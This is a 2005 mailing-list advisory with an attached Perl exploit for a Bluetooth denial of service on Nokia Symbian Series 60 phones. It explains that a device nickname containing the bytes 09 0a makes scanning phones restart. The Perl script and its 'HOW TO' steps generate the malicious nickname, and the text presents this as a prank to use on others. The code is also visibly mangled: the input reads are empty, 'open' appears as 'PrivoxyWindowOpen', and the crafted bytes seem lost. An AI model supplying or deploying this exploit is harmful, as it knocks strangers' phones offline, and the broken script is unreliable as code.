#*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#* Title: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart Release Date: 03/06/2005 Vulnerability Type: Denial of service via network Severity: Hight Model affected: All Symbian 60 Auth: http://www.nokia.com Disclaimer: ========== The information is provided "as is" without warranty of any kind. The author of this issue shall not be held liable for any damages due to the informations contained in this advisory. Vulnerability Description: ========================= Q-Nix reported a vulnerability in Nokia's Symbian operating system. A remote user can cause denial of service conditions. A remote user can set specially crafted nickname. Then, when a target user searches available Bluetooth devices and discovers the nickname, the target user's phone will restart. Credits: ======== Q-Nix Greets to : Vamp, Beafcake, QatarBoy, C0NIK, Hailhackerz, QEX, HaXeR, Silentneedle #*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#* When i was playing with my bluetooth device, i found that if you add in your nickname " 09 0a " in hex, it will cause that every one who search for available bluetooth devices and find your nickname his nokia phone will restart. you should add a nicname like that, [something][09 0a in hex][just add anything here] you should add anything before 09 0a because the nokia phones think that its a space at the end, and it will auto deleted so you should add any thing before 090a . Q-Nix: "This exploit is for nokia symbian 60 (ser.60) , a vulnerability in nokia bluetooth , it cause a Remote restart for any one who search in bluetooth devices and find your nick name. BOOMB AND HIS PHONE RESTARTS !!! ..." -------------start--------------- #!/usr/bin/perl -w # nokia_bt_rr.pl # Qnix # 2005-03-04 # # # Hello # This exploit is for nokia symbian 60 (ser.60) , a vulnerability # in nokia bluetooth , it cause a Remote restart for any one # who search in bluetooth devices and find your nick name # BOOMB AND HIS PHONE RESTARTS !!! ... # # Greets to : Vamp , beafcake , QatarBoy , C0NIK ,hailhackerz # QEX , HaXeR , Silentneedle ,And all Security 4 Arab members # # # HOW TO : - # # 1- Run the exploit and make a nickname . # 2- Send the output to your nokia phone . # 3- Open the file in your mobile and copy the nickname . # 4- Paste the nickname in bluetooth phone name . # 5- Have a nice time ;) . # # my $btnick; my $bth; my $bts; my $file; $bth = " ."; print "\n*******************************************************\n"; print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n"; print "** BY QNIX | Q-nix[@]bsdmail[dot]org **\n"; print "*******************************************************\n"; print " \n write your nickname : "; $btnick = ; chomp($btnick); print " \n OUTPUT : "; $file = ; chomp($file); PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n"; $bts = "$btnick$bth"; print BLUEN ("$bts"); close(BLUEN); print "\n Done !! , send the output to your nokia and copy the file to the bluetooth nickname space . \n\n"; -------------end----------------- may be someone got more information about that bug or any thing else. and maybe someone can develop that problem.